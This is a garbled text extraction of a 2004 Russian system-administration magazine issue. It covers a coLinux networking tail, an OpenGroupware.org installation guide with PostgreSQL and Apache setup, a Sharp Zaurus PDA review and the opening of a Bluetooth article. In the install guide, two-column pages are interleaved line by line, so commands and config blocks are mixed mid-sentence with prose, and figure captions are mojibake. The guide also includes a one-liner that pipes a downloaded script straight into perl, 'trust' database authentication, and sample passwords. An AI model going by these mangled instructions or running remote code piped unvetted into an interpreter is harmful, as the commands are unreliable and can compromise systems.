<network index="0" type="bridged" name="Realtek"/>
Здесь, в поле name, указывается подстрока из назва-
ния сетевого адаптера. Новые настройки сети будут при-
менены после перезапуска coLinux.
При выборе того или иного способа взаимодействия
необходимо учитывать следующий момент: при работе с
сетевым интерфейсом напрямую (без ICS), «гостевой ОС»
понадобится дополнительный маршрутизируемый IP-адрес.
Ведь фактически мы имеем схему, при которой на одной
машине используется несколько различных IP-адресов. В
случае же использования ICS нашей машине для связи с
внешним миром достаточно одного маршрутизируемого IP-
адреса, уже имеющегося у компьютера. «Гостевая ОС»
автоматически попадает в сеть из private subspace, а взаи-
модействие организуется с помощью средств ICS.
Основные команды системы Portage
Более подробную информацию по работе с системой
portage можно найти по адресу: http://www.gentoo.org/doc/
ru/portage-manual.xml.
11
 администрирование
OpenGroupware.org,
ИЛИ ПОСЛЕДНИЙ КИРПИЧ В СТЕНЕ
Несмотря на замечания скептиков, операционная система
GNU/Linux смогла привлечь (и привлекает) на свою сторо-
ну пользователей. Но если с установками на сервере или
на домашнем компьютере ситуация более или менее опре-
деленная и зависит не в последнюю очередь от подготовки
и желания пользователя или администратора, то вот с при-
менением этой системы на корпоративном уровне все не
так просто, как хотелось бы. И те администраторы, кото-
рые рискнули сделать этот шаг, что скрывать, сталкивают-
ся с проблемами. Недостаток информации, разнообразие
программ, интерфейсов, плохая и путающая пользовате-
12
СЕРГЕЙ ЯРЕМЧУК
лей локализация, – это далеко не полный список, с чем
придется столкнуться. Между тем в сообществе Open Source
уже известно несколько проектов, цель которых заполнить
имеющийся вакуум и заменить приложения, привычные по
Windows.
Система программного обеспечения коллективной ра-
боты OpenGroupware.org (OGo) призвана конкурировать с
такими известными продуктами, как Microsoft Exchange, IBM
Lotus Domino и Novell GroupWise. Проект не возник на ров-
ном месте, основой послужил код одной из самых ранних
таких разработок под GNU/Linux – Skyrix 4.1 Groupware

Server, представленный немецкой компанией Skyrix
Software AG, занимавшейся разработкой этого приложения
с 1996 года (до 2000 года он назывался LSOffice). Именно
поэтому с самого начала это был рабочий продукт, а не про-
тотип. Буквально за один день после анонса сайт проекта
http://www.opengroupware.org посетили более чем два мил-
лиона посетителей. Схожесть названия (да и истории воз-
никновения) с еще одним известным Open Source-проек-
том – OpenOffice.org породила некоторую неразбериху. На
сайте размещено примечание, что это хотя и дополняющие
друг друга, но все-таки отдельные сообщества. Кроме GNU/
Linux, OGo в настоящее время портирован под BSD,
GNUstep и MacOSX. Интерфейс полностью переведен на
английский и немецкий, плюс ведутся разработки по лока-
лизации на датский, испанский, итальянский, французский,
голландский, корейский, турецкий, японский и китайский.
К сожалению, русского в этом списке нет. Все данные хра-
нятся в обычных текстовых файлах, рисунки хранятся в от-
дельных файлах и используется Unicode, поэтому локали-
зация не представляет серьезных проблем. Достаточно пе-
ревести все параметры в файлах одного из подкаталогов /
opt/opengroupware.org/Resources/ и настроить клиентов на
вывод в нужной кодировке. Дополнительно в помощь
«Translation Project» представляет два скрипта, помогаю-
щих в переводе интерфейса (рис. 1). Но, очевидно, не каж-
дый будет этим заниматься, и OGo обретет у нас популяр-
ность, после того как на него обратят внимание компании-
разработчики ПО вроде ALTLinux.
Ðèñóíîê 1
Приложения, входящие в состав OGo
Для доступа ко всем функциональным возможностям и дан-
ным проект представляет открытые, основанные на XML
интерфейсы и API. При этом все функции реализуются в
виде модулей, что позволяет расширять возможности по
мере необходимости. Поэтому состав приложений вполне
может измениться, разработчики открыты для общения.
№10(23), октябрь 2004
администрирование
Итак:
! Contact Management (менеджер контактов) – сохране-
ние и организация персональных и групповых контак-
тов, с широкими возможностями по поиску и оптимиза-
ции данных, с возможностью экспорта и удаленного
доступа.
! Group Calendar (календарь) – планирование событий как
персонально, так и для группы. Возможность добавле-
ния примечаний, автоматическое обнаружение конфлик-
тов, простая настройка повторяющихся событий.
! Resources Planner (планировщик ресурсов) – позволяет
рационально планировать использование различного
имущества (автомобили, проекторы), помещений, с воз-
можностью поиска свободных интервалов времени, ав-
томатической проверкой конфликтов, посылки уведом-
лений.
! Task Management (менеджер задач) – организация пер-
сональных, групповых или специфических задач с воз-
можностью их упорядочивания по приоритетам, дате, со-
стоянию, выводом на персональной странице и уведом-
лением по e-mail.
! E-Mail Client – предлагает удобную среду для обмена
e-mail посредством прямого доступа к IMAP4 и POP3-
серверам, с предоставлением большинства принятых в
e-mail клиентах функциональных возможностей и им-
портом данных в менеджер контактов.
! Projects and Documents (проекты и документы) – единая
централизованная среда, позволяющая использовать
файлы и документы локально и удаленно группами
пользователей или участниками отдельного проекта, с
выдачей необходимых ссылок пользователям.
! News (новости) – доска объявлений, дает возможность
публиковать необходимую информацию (правила ис-
пользования, новости компании и пр.), плюс служит на-
поминанием о текущих задачах и служит как персональ-
ная страница.
! Palm Sync (синхронизация с Palm) – синхронизация дан-
ных в устройствах Palm с приложениями OGo.
Плюс ко всему имеется легко перестраиваемый пользо-
вательский интерфейс, а администратор получает возмож-
ность удобного манипулирования пользовательскими и груп-
повыми аккаунтами, и по настройке OGo. Клиентами OGo
могут выступать не только веб-браузеры, но некоторые по-
пулярные утилиты вроде MS Outlook, kOrganizer, Mac OS/X
Finder, Apple iCal.app, Ximian Evolution.
Надо отметить, что OGo далеко не единственный про-
ект такого рода, реализованный под свободные ОС или име-
ющие статус OpenSource. Поэтому стоит вкратце, справед-
ливости ради, дать ссылки и на остальные решения. Тем
более даже у некоторых из платных решений базовые вер-
сии, большей частью свободны. Самый известный и доволь-
но мощный продукт SUSE Linux Openexchange Server (http://
www.suse.com/us/business/products/openexchange/index.html).
Далее проект от разработчиков KDE и финансируемый пра-
вительством Германии – Kroupware (http://www.kroupware.org,
на момент написания статьи ссылка не работала), DeskNow
Mail and Collaboration server (http://www.desknow.com/
index.html), HyperOffice (http://www.hyperoffice.co), проект,
13
 администрирование
основанный на zope и qmail Amphora (http://www.amphora.ee/ В результате образуется подкаталог rpm, содержащий
eng), LinuXchangE (http://www.linuxchange.com), PHPGroupware 78 файлов, переходим в него:
(http://www.phpgroupware.org).
В OGo подкупает размах, зрелость и самое главное – # cd rpm
свобода с использованием открытых технологий. Именно
эти качества могут привести к тому, что OGo вполне воз- Все в принципе не нужны, но какая разница.
можно и станет номером один в этом списке.
# rpm -Uvh *.rpm
Установка
Если цель ваших исследований – ознакомление с этим про- В процессе система выдает сообщения о домашнем
дуктом, и имеется возможность скачать файл большого каталоге утилиты и о создаваемых пользователях.
объема, то лучшим и самым быстрым вариантом получить Running post installation in root '/opt/skyrix/system' ..
работающую версию будет использование LiveCD, базиру- GNUstep root: /opt/skyrix/system
ющегося на Knoppix (http://www.opengroupware.org/knoppix/ ...
GNUstep Root: /opt/opengroupware.org
index.html). В этом случае можно носить его с собой для No 'skyrix' group available on the system, creating...
демонстрации возможностей. В любом другом случае при- Using group ID '321'
Made a backup of the group file
дется немного повозиться с установкой. Но в отличие от
in '/opt/opengroupware.org/backup/200409251027'
многих других проектов, только начавших свой путь, уста- Created group 'skyrix'.
новка особых проблем вызвать не должна, и, имея некото- No 'opengroupware' user available on the system, creating...
Using user ID '56641'
рый опыт общения с UNIX-системами, заставить работать Made a backup of the passwd/shadow file
OGo, безусловно, можно. Дополнительно проект в после- in '/opt/opengroupware.org/backup/200409251027'
Created user 'opengroupware' with UID '56641'
днее время начал быстро обрастать HOWTO, в которых
объясняется специфика установки для отдельного дистри- Далее конфигурирование PostgreSQL (подробности см.
бутива и готовыми скриптами, автоматизирующими про- в статье Сергея Супрунова «PostgreSQL: первые шаги»,
цесс. Но, если почитать всю доступную документацию, мож- журнал «Системный администратор» № 7, 2004 г.).
но немного запутаться, т.к. авторы HOWTO подходят по- Редактируем файл /var/lib/pgsql/data/pg_hba.conf:
разному к самому процессу, а в предлагаемых скриптах ис-
пользуются разные пути и переменные. К тому же в неко- local all all trust
host all all 127.0.0.1 255.255.255.255 trust
торых документах указаны команды, в которых на данный host all all 0.0.0.02 55.255.255.255 reject
момент уже нет необходимости. Как пример rpm-пакеты рас-
паковываются в /opt/opengroupware.org (исключение – не- Так советуют разработчики. Но в этом случае к базе
давно появившиеся пакеты для SuSE 9.1 – /usr/local/share/ данных получают доступ все локальные пользователи, а
opengroupware.org-1.0a) и /opt/skyrix/, Debian в /usr/lib/ поэтому данную конфигурацию следует использовать толь-
opengroupware.org, скрипты для Slackware устанавливают ко при отладке.
все в каталог вида /opt/OGo-yyyymmdd/. Хотя если почитать Далее стоит безопасности ради использовать конкрет-
документацию годичной давности, то можно сделать вы- ного пользователя вроде:
вод, что раньше возни было все-таки побольше. А поэтому
просто необходимо быть внимательным и для начала ис- host opengroupware skyrix 127.0.0.1 255.255.255.255 trust
пользовать официальную (т.е. общую) документацию.
Далее на странице закачки уже появились ссылки на А лучше еще и требовать пароль для доступа.
прекомпилированные пакеты, собранные сторонними доб-
ровольцами, все в основном под glibc 2.3. Если в дистрибу- host opengroupware skyrix 127.0.0.1 255.255.255.255 ↵
passwd (èëè md5)
тиве используется более ранняя версия этой библиотеки,
попробуйте собрать из исходников или обновите glibs. Как Да и в более ранних версиях (<=7.2) нужно использо-
исключение имеются пакеты для RedHat 7.3 (http:// вать конструкцию с одним all.
ftp.nakedape.cc/nakedape/rh73/rpm/opengroupware). Приведу
пример ручной конфигурации OGo для rpm-пакетов, испро- local all trust
бованная на SuSE 9.1, RedHat 9, Linux XР и Mandrake 10,
хотя сейчас доступен Perl скрипт Kelley Graham http:// Далее в файле /var/lib/pgsql/postgresql.conf должны быть
www.toasterz.com/ogo/add_remove_ogo.pl, который может такие строки.
сделать большую часть работы за вас (wget -q -O – http://
exchangekiller.com/install | perl и ./add_remove_ogo.pl install). # CONNECTIONS AND AUTHENTICATION
#--------------------------------------------------------
Итак, прекомпилированые пакеты доступны как по от- # - Connection Settings -
дельности, в этом случае нужно скачать все имеющие tcpip_socket = true
max_connections = 32
latest в названии или единым архивом, например, rpm- port = 5432
all-latest.tar.bz2.
Первым делом распаковываем архив: Перезапускаем сервер:

# tar -xzvf rpm-all-latest.tar.bz2 # /etc/init.d/postgresql restart

14
 администрирование
Shutting down PostgreSQL done Allow from all
</Directory>
Starting PostgreSQL done
Alias /OpenGroupware.woa/WebServerResources ↵
Теперь создаем новую базу данных, таблицы, пользо- /opt/opengroupware.org/WebServerResources
вателя. # Exchange public folders URL
<LocationMatch "^/zidestore/*">
SetHandler ngobjweb-adaptor
# su SetAppPort 23000
# cd /opt/opengroupware.org/Database/PostgreSQL </LocationMatch>
# su postgres
# createdb ogo Alias /zidestore/so/images /opt/opengroupware.org ↵
/WOApps/ZideStore.woa/WebServerResources
CREATE DATABASE
# News Alias
# createuser -A -D ogo Alias /ArticleImages /opt/opengroupware.org/news
CREATE USER Перезапускаем сервер.
# psql ogo ogo
#/etc/init.d/apache2 restart
Welcome to psql 7.4.2, the PostgreSQL interactive terminal.
Syntax OK
Type: \copyright for distribution terms Starting httpd2 (prefork) done
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query Запускаем OpenGroupware. При отладке полезно давать
\q to quit команды прямо из консоли, тогда сразу будут видны все
ogo=> \i pg-build-schema.psql ошибки.

Дело сделано, выходим. #su opengroupware

# echo "source /opt/opengroupware.org ↵
/OpenGroupware.org.sh" >> ~/.bash_profile
ogo=> \q # echo "export LD_ASSUME_KERNEL=2.4.1" >> ~/.bash_profile

Настала очередь Apache. Для начала необходимо уста-
новить модуль, находящийся по адресу: http://www.opengroup
ware.org/sources/old-cvs-sources/opengroupware.org-mod_
ngobjweb-latest.tar.gz.
# tar -zxvf opengroupware.org-mod_ngobjweb-latest.tar.gz
# cd opengroupware.org-mod_ngobjweb
Примечание в дистрибутивах, не использующих NTPL,
последняя строка не нужна, в Fedora она будет иметь вид:
export LD_ASSUME_KERNEL=2.4.19.
# /opt/opengroupware.org/WOApps/OpenGroupware.woa/ix86 ↵
/linux-gnu/gnu-fd-nil/OpenGroupware ↵
-WOHttpAllowHost localhost

Если установлен второй Apache, то, возможно, в фай-
ле GNUmakefile придется исправить строку: HTTPD =
$(APACHE)/sbin/httpd2.
# make
В первый раз система, скорее всего, не сможет найти
требуемые версии библиотек и выдаст ошибки. Поэтому
для начала нужно занести следующие строки в файл /etc/
ld.so.conf (для rpm-версии, в остальных случаях измените
путь), после чего даем команду ldconfig.

Получаем модуль ngobjweb_x.x.xx.so, где х соответствует /opt/opengroupware.org/Libraries/ix86/linux-gnu/gnu-fd-nil

версии сервера. Копируем его, куда нам удобнее.
# mkdir /opt/opengroupware.org/module
# cp ngobjweb_2.0.40.so /opt/opengroupware.org/module
/opt/skyrix/system/Libraries/ix86/linux-gnu/gnu-fd-nil
Для удовлетворения зависимостей в случае SuSE 9.1
необходимо дать такие команды:

Следующим шагом редактируем /etc/apache2/httpd.conf. # ln -s /usr/lib/libldap.so.199.3.4 /usr/lib/libldap.so.2

Здесь два варианта – занести все параметры в httpd.conf
или вынести все в отдельный файл и прописать путь к нему
строкой вида Include /etc/apache2/ogo.conf. Поступайте, как
вам удобней.
будет указана требуемая версия. Например:
#OpenGroupware Apache Module config file.
/opt/opengroupware.org/WOApps/OpenGroupware.woa/ix86/linux-gnu
LoadModule ngobjweb_module ↵
/opt/opengroupware.org/module/ngobjweb_2.0.40.so
<LocationMatch "^/OpenGroupware/*">
SetHandler ngobjweb-adaptor
SetAppPort 20000
# SNSPort 127.0.0.1:20000
</LocationMatch>
<Directory "/opt/opengroupware.org/WebServerResources">
Order allow,deny
# ln -s /usr/lib/libssl.so.0.9.7 /usr/lib/libssl.so.0.9.6
# ln -s /usr/lib/libcrypto.so.0.9.7 ↵
/usr/lib/libcrypto.so.0.9.6
# ln -s /usr/lib/liblber.so.199.3.4 /usr/lib/liblber.so.2
Если используется другой дистрибутив, то в сообщении
/gnu-fd-nil/OpenGroupware: error while loading shared libraries:
liblber.so.2: cannot open shared object file:
No such file or directory
А команда ls -al /usr/lib/lib* укажет на имеющуюся.
Запускаем:
# /opt/opengroupware.org/WOApps/OpenGroupware.woa/ix86 ↵
/linux-gnu/gnu-fd-nil/OpenGroupware -WOPort 20000 ↵
-WOHttpAllowHost localhost ↵

№10(23), октябрь 2004 15

 администрирование
-OGoMinimumActiveSessionCount 0 -LSNewsImagesUrl ↵
'/ArticleImages' -LSNewsImagesPath ↵
/opt/opengroupware.org/news -LSConnectionDictionary ↵
{databaseName = ogo; hostName = 127.0.0.1; ↵
password = "qwerty"; port = 5432; userName = ogo} ↵
-LSAdaptor PostgreSQL72 -LSModelName ↵
OpenGroupware.org_PostgreSQL >> /var/log/ogo.log 2>&1 &
# /opt/opengroupware.org/WOApps/ZideStore.woa/ix86 ↵
/linux-gnu/gnu-fd-nil/ZideStore -WOPort 23000 ↵
-WOHttpAllowHost localhost -SxExplain YES ↵
-WOCachingEnabled YES ↵
-WOHttpTransactionUseSimpleParser YES ↵
>> /var/log/ogo.log 2>&1 &
Для автоматического запуска лучше использовать init-
скрипт. Ничего самому писать не надо, уже имеются гото-
вые. Для RedHat смотрите на http://toasterz.com/ogo/docs/
opengroupware, в пакете slack-all для Slackware тоже име-
ется готовый скрипт, другие можно найти по адресу: http://
helms-deep.cable.nu/~rwh/howtos/opengroupware, http://
exchangekiller.com/docs/opengroupware (наиболее полный),
http://helms-deep.cable.nu/~rwh/howtos/opengroupware2, http://
mail.opengroupware.org/pipermail/users/2003-July/000427.html,
http://www.toasterz.com/ogo/docs/run.conf. Выберите любой
понравившийся, только проверьте пути.
# wget -v -N http://exchangekiller.com/docs/opengroupware
# cp ./opengroupware /etc/init.d/
# chmod u+x /etc/init.d/opengroupware
# ln -s /etc/init.d/opengroupware ↵
/etc/init.d/rc3.d/S20opengroupware
# ln -s /etc/init.d/opengroupware ↵
/etc/init.d/rc3.d/K20opengroupware
# ln -s /etc/init.d/opengroupware ↵
/etc/init.d/rc5.d/S20opengroupware
# ln -s /etc/init.d/opengroupware ↵
/etc/init.d/rc5.d/K20opengroupware
Запускаем.
# /etc/init.d/opengroupware start
Если теперь набрать в строке веб-браузера: http://
localhost/OpenGroupware, то получите доступ как админис-
тратор со всеми привилегиями без пароля (рис. 2), кото-
рый тут же надо установить (Preferences → Edit Password) и
создать остальных пользователей. Теперь при входе будет
запрашиваться логин и пароль.
Ðèñóíîê 2
Тонкая настройка параметров работы сервера OGo мо-
жет производиться из командной строки при запуске, путем
16
ручного редактирования конфигурационных файлов или
при помощи команды Defaults. Для запуска последней вы-
полняем от имени пользователя opengroupware команду:
# source /opt/opengroupware.org/OpenGroupware.org.sh
(если она не занесена в файл ~/.bash_profile). Теперь мож-
но работать, например, для просмотра установленных па-
раметров используется опция read.
# Defaults read
{
Defaults = {};
NSGlobalDomain = {
"skyrix_id" = server.com;
LSAdaptor = PostgreSQL72;
LSAttachmentPath = "/opt/opengroupware.org/documents";
LSConnectionDictionary = {
databaseName = ogo;
hostName = localhost;
password = "qwerty";
port = 5432;
};
LSModelName = "OpenGroupware.org_PostgreSQL";
LSNewsImagesPath = "/opt/opengroupware.org/news";
LSNewsImagesUrl = "/ArticleImages";
Languages = (
English
);
NGBundlePath = "/opt/opengroupware.org/Library ↵
/OpenGroupware.org";
TimeZoneName = GMT;
XMLReader = libxmlSAXDriver;
};
OpenGroupware = {};
skyaptnotify = {
AptNotifyFromAddress = "sergej@server.com";
AptNotifySkyrixUser = root;
AptNotifySkyrixPassword = khjds5d;
};
}
Параметр write установит указанный ключ, delete уда-
лит значение. Например:
# Defaults write NSGlobalDomain LSConnectionDictionary ↵
'{hostName=localhost; userName=ogo; ↵
password="12345"; port=5432; databaseName=ogo}'
# Defaults write NSGlobalDomain NGBundlePath ↵
"/opt/opengroupware.org/Library/OpenGroupware.org"
# Defaults write NSGlobalDomain LSAttachmentPath ↵
/opt/opengroupware.org/documents
Настройка для работы с LDAP описана в документе
«Active Directory Authentication Mini-HOWTO», интеграция с
телефонными системами в «Telephony Integration with OGo»,
которые доступны на сайте.
Средства обеспечения коллективной работы помогают
оптимизировать рабочее время сотрудников, позволяя луч-
ше управлять свободным временем, распределять задачи,
эффективней использовать информацию. Миру Open Source
не хватало готового полноценного продукта. Теперь эта си-
туация изменилась. Если почитать отзывы о тестировании
OGo годичной давности, то несмотря на сырость програм-
мы, отмечалось, что это готовый и, самое главное, своевре-
менный продукт. За последнее время убраны некоторые ше-
роховатости, намечены разработки на будущее, проект об-
рос документацией, несколькими подпроектами и армией
пользователей. Возможно, кто-то предпочтет использовать
OpenGroupware.org вместо популярных сегодня платных и
отнюдь не дешевых решений.

ИДЕАЛЬНЫЙ КАРМАННЫЙ КОМПЬЮТЕР
ДЛЯ СИСТЕМНОГО АДМИНИСТРАТОРА
ЧАСТЬ 1
За более чем пять лет общения с карманными компьюте-
рами на платформах PalmOS и PocketPC я уже привык к
мысли о том, что, хотя «карманник» и может значительно
облегчить повседневную работу системного администра-
тора, но полноценно заменить ноутбук при диагностике и
устранении неисправностей в работе сетей не в состоянии.
В первую очередь это обусловлено «урезанностью» опера-
ционной системы, заточенной под функции управления пер-
сональной информацией (PIM), и ограниченной функцио-
нальностью устройств ввода/вывода. Кроме того, сказыва-
ется отсутствие развитого программного обеспечения, удов-
летворяющего потребности системного администратора. И
хотя к трудностям работы с виртуальной клавиатурой мож-
но привыкнуть, а число программ благодаря стараниям эн-
тузиастов постоянно увеличивается, ни устройства на базе
PocketPC, ни тем более устройства, работающие под уп-
равлением PalmOS, не в состоянии выступать в роли удоб-
ного и полноценного инструмента сисадмина. Некоторый
свой опыт использования PocketPC в качестве инструмен-
та IT-специалиста я обобщил в статье, с которой можно оз-
накомиться по адресу: www.markelov.net/ppc1.html. Но и опе-
рационка Microsoft вслед за PalmOS для меня осталась в
прошлом.
Ðèñóíîê 1. ÊÏÊ Zaurus
Каким же видится мне идеальный карманный компью-
тер, способный удовлетворить потребности IT-специалис-
та? Ну, во-первых, хотелось бы иметь установленную опе-
рационную систему с развитой поддержкой сети. Во-вто-
рых, экран с разрешением не менее 640 на 480 точек и удоб-
ную, но не большую клавиатуру для комфортной работы с
командной строкой. В-третьих, желательна возможность без
переделок исходного кода или с его минимальными пере-
№10(23), октябрь 2004
администрирование
АНДРЕЙ МАРКЕЛОВ
делками пользоваться огромным накопленным фондом сво-
бодного ПО для UNIX-подобных систем. Ну и наконец, в-
четвертых, такой КПК не должен уступать в плане реали-
зации своих прямых функций (органайзер, проигрывание
музыки и видео, игры и так далее) конкурентам из стана
PalmOS и PocketPC.
Как оказалось, в реальности такое устройство «вполне
имеет место быть». Называется оно Sharp Zaurus SL-C860
и работает под управлением специализированной версии
Linux (рис. 1). При первой же возможности приобрести дан-
ного «зверя» в личное пользование, я не преминул ею вос-
пользоваться. А в данной статье хочу несколько обобщить
опыт его эксплуатации.
Аппаратное обеспечение
Начну описание с аппаратной части, дабы стали понятны
объективные ограничения, с которыми столкнется линук-
соид, севший за клавиатуру Zaurus. Хотя в случае с кар-
манным компьютером правильнее было бы сказать «взяв-
шего в руки» клавиатуру – при работе с «карманником» на
весу вы держите его именно за нижнюю часть, на которой
и расположена клавиатура.
Ðèñóíîê 2. Ïîõîäíûé íàáîð ñèñàäìèíà. ÊÏÊ, Wi-Fi-êàðòà
D-Link DCF-660W è Ethernet-êàðòà TRENDnet TE-CF100
«Железо» вполне соответствует сегодняшним стандар-
там для КПК. На борту машинки установлен процессор Intel
XScale PXA 255, работающий с тактовой частотой в 400 МГц.
Память делится на ОЗУ, объемом в 64 Мб и энергонезави-
симую Flash-память, играющую роль ПЗУ и «винчестера»
одновременно. Диагональ экрана равняется 3,7". Как я уже
писал, разрешение матрицы дисплея 640 на 480 точек, а
число отображаемых цветов равняется 65 тысячам. Говоря
об экране, нельзя не упомянуть возможность последнего
17
 администрирование
поворачиваться, и складываться поверх клавиатуры. При
этом «клавиатурник» превращается в безклавиатурную
машинку, что достаточно удобно, например, в метро для
просмотра фильмов и для чтения электронных книг. Име-
ются разъемы для подключения карт расширения стандар-
тов Compact Flash type I,II и SD/SDC/MMC. Первый разъем
можно использовать для оснащения вашего КПК сетевой
или Wi-Fi-карточкой, а второй – для расширения памяти ус-
тройства. К персональному компьютеру Zaurus подключа-
ется посредством USB-шнура. Также присутствует ИК-порт.
Вес устройства – 250 грамм.
Теперь несколько слов о клавиатуре. На Zaurus она уди-
вительно удобная для своих небольших размеров, и обес-
печивает вполне комфортную работу. Достаточно сказать,
что эту статью я набирал и редактировал именно на Zaurus,
в среде встроенного текстового редактора Hancom Mobile
Word. Конечно, ограниченное число кнопок клавиатуры, а
именно 59, заставило разработчиков софта «навесить» по
несколько символов на каждую клавишу. С другой стороны,
наверняка многие из читателей в свое время имели дело с
замечательным домашним компьютером ZX-Spectrum. Кла-
виатура ZX-Spectrum и вовсе имела 48 кнопок, что нисколь-
ко не мешало полноценной работе с этим ПК.
Наконец после краткого знакомства с «начинкой» аппа-
рата перейдем к основной части нашего обзора – описа-
нию того, чем же кардинально выделяется данный карман-
ный компьютер из числа конкурентов, а именно, программ-
ной части.
только испытаю на личном опыте, постараюсь отразить впе-
чатление от работы с ней на страницах журнала. По отзы-
вам же в форумах эта версия ROM менее приспособлена к
функциям КПК, и пытается сделать из Zaurus подобие ма-
ленького ноутбука.
В дальнейшем, говоря о функционировании и исполь-
зовании карманного компьютера, я буду опираться на «Мак-
центровскую» версию, которая мне досталась уже предус-
тановленной на КПК.
Включив карманный компьютер, пользователь прями-
ком попадает в графическую оболочку для мобильных ком-
пьютеров Qtopia (версии 1.5.4). Интерфейс представлен в
виде нескольких закладок, содержащих иконки графичес-
ких приложений. Нужно заметить, что после установки кон-
сольных утилит иконки не добавляются – доступ к ним вы
получите, только зайдя в консоль. По умолчанию присут-
ствуют закладки: приложения, игры, мультимедиа, Интер-
нет, PIM, настройки, файлы.

Особенности Linux на Zaurus

Говоря о Linux на Zaurus, «завроводы» обычно указывают
версию прошивки ROM. Пользователь может самостоятель-
но обновлять и модифицировать операционную систему,
находящуюся во flash-памяти, поэтому в настоящее время
получили распространение несколько версий ROM для КПК. Ðèñóíîê 3. Ãðàôè÷åñêàÿ îáîëî÷êà
Большинство из них работает под управлением графичес- В разделе управления персональной информацией при-
кого интерфейса Qtopia разработки Trolltech. сутствуют приложения: адресная книга, дела и календарь,
Во-первых, это оригинальная версия прошивки от Sharp которые в целом по своему функционалу аналогичны соот-
на японском языке, которая по понятным причинам не по- ветствующим приложениям для КПК на платформах
лучила распространения ни в России, ни в англоязычных PalmOS и Windows Mobile.
странах. В разделе «Интернет» находятся две иконки: браузер
Во-вторых, это разрабатываемая на основе оригиналь- Opera 7.0 и клиент электронной почты.
ной версии «англофицированная» прошивка Cacko ROM,
которая вполне корректно работает с русским языком вслед-
ствие русскоязычности некоторых членов Cacko Team. Дан-
ную прошивку можно скачать в Интернете бесплатно.
В-третьих, – платный вариант немного устаревшей вер-
сии предыдущего ROM с русифицированным интерфейсом,
распространяемый компанией «МакЦентр».
В-четвертых, платный англоязычный tkROM, о котором
я не могу ничего сказать, кроме того, что он существует.
Ну и наконец – это ROM, в отличие от всех остальных
базирующийся не на графическом интерфейсе Qtopia, а на
адаптированной версии X Windows. Разрабатывается он
командой Cacko и, как и их прошивка под Qtopia, абсолют-
но бесплатен. С сайта Cacko Team можно также скачать
ряд уже скомпилированного для Zaurus софта, в частно-
сти, AbiWord, Fierfox, и другое ПО, перенесенное с «боль-
шого» Linux. Сам я пока эту прошивку не пробовал, но как Ðèñóíîê 4. Áðàóçåð Opera

18

Вкладка «Мультимедиа» содержит проигрыватели му-
зыки, видео и программу звукозаписи. «Из коробки» уста-
новленный софт позволяет проигрывать видео в формате
DivX, а музыку в MP3.
Самое большое число программ вынесено на вкладку
«Приложения». Простые редакторы текста и графики,
калькулятор, иконка «Консоль», обеспечивающая доступ
к командной строке, просмотрщик презентаций, а также
два достаточно продвинутых редактора HancomWord и
HancomSheet, соответственно совместимые с Microsoft
Word и Excel по форматам файлов.
Ðèñóíîê 5. HancomWord
Оставшиеся две вкладки – это «Настройки» и «Файлы».
На первую вынесены все опции управления КПК, в том чис-
ле и оболочка для установки пакетов с дополнительным
программным обеспечением. Вторая же представляет из
себя встроенный в Qtopia файловый менеджер, видящий
файлы, правда, только внутри домашней директории. Од-
нако его можно «обмануть», создав симлинк на корень
файловой системы внутри домашнего каталога.
Запустив из консоли команду uname -a (кстати, вы впол-
не можете зайти на Zaurus через ssh, по умолчанию подня-
том на КПК) мы получим следующий вывод:
$ uname -a
Linux zaurus 2.4.18-rmk7-pxa3-embedix #1,
11 2003 00:01:53 +0000 armv5tel unknown
С версией ядра ясно. Теперь разберемся с файловой
системой. В её качестве используется jffs2 (включена в
официальное ядро Linux с версии 2.4.10), которая является
журналируемой файловой системой, разработанной спе-
циально для встраиваемых систем. Подробнее ознакомить-
ся с информацией, касающейся jffs2, можно по ссылке на
сайте компании Red Hat (sources.redhat.com/jffs2), которая
собственно и разработала данную файловую систему, ос-
новываясь на оригинальной jffs от Axis Communications AB.
Помимо jffs2 в ядро Zaurus включена поддержка fat и ext3,
которые можно использовать, например, при работе с кар-
тами расширения памяти SD и CF.
Особенностью организации иерархической структуры
файловой системы является то, что некоторые каталоги, в
частности /etc, /usr/bin, /usr/lib, на самом деле не что иное,
как символические ссылки на соответствующие каталоги
внутри /home. Корневая же система монтируется в режиме
№10(23), октябрь 2004
администрирование
«только чтение», что сделано для придания наладоннику
некоего запаса прочности и защиты от попыток ввода ре-
курсивного rm на корневой системе. Правда, если ввести
команду типа
mount -o remount,rw /
у вас все же появится возможность испортить ФС. В каче-
стве последнего «форпоста» имеются еще два запасных
раздела с еще одной «спасательной» минимальной корне-
вой системой, и раздел, содержащий основное и запасное
ядро Linux. При нормальной работе КПК эти два раздела
не смонтированы.
По умолчанию на Zaurus установлены Samba и SSH-сер-
вера, которые упрощают взаимодействие КПК с настоль-
ным компьютером. Кроме того, вы можете установить на
Zaurus сервер VNC и полностью управлять «карманником»
по сети с персонального компьютера.
Ðèñóíîê 6. Ñåòü
В заключение хотелось бы сказать, что общение с уст-
ройством оставляет двоякое впечатление. С одной сторо-
ны, богатые возможности программного и аппаратного
обеспечения, а с другой стороны, частая необходимость
«доводки напильником» самого необходимого софта, о воз-
можных проблемах которых не задумываются пользовате-
ли других платформ. Наиболее типичный пример – руси-
фикация ICQ. Учитывая нетривиальность решения многих
проблем и необходимость обращаться к консоли, я бы мог
порекомендовать данный КПК исключительно IT-специали-
стам, для которых Zaurus в сочетании с WiFi- или Ethernet-
адаптером может стать незаменимым инструментом.
В следующем номере журнала я расскажу об особенно-
стях установки софта на Zaurus и подводных камнях, с ко-
торыми может столкнуться пользователь.
При первом же знакомстве с КПК Zaurus SL-С860 и в
процессе подготовке данной статьи большим подспорьем для
меня оказались материалы с форумов zaurususergroup.com
и www.hpc.ru, без использования которых процесс знаком-
ства со спецификой «карманного» Linux затянулся бы на
гораздо более длительный срок. С темами этих форумов я
в первую очередь рекомендую ознакомиться читателям, за-
думавшимся о приобретении или уже купившим этот заме-
чательный гаджет.
19
 администрирование
BLUETOOTH + LINUX, ИЛИ СИНИЙ ЗУБ
НА СЛУЖБЕ CИСТЕМНОГО АДМИНИСТРАТОРА
Некоторое время назад у меня возникла необходимость по
выходным дням наведываться через Интернет в локальную
сеть моего работодателя. Казалось бы, решение вопроса
банально. Купить простенький модем, присоединить его к
своей домашней телефонной линии и с помощью обычно-
го десктопа делать то, что нужно. Но душа просила чего-то
более удобного и мобильного. И тогда было решено подру-
жить между собой мои служебные железки – ноутбук
Samsung p25 и мобильный телефон Nokia 6310i. Побродив
по просторам сети и посмотрев, как народ решает подоб-
ные проблемы, я уже было подумал купить себе соедини-
тельный кабель Nokia, прицепить его к последовательному
порту и через него работать с GSM-модемом, встроенным
в телефон. Но потом в голову стали приходить мысли о том,
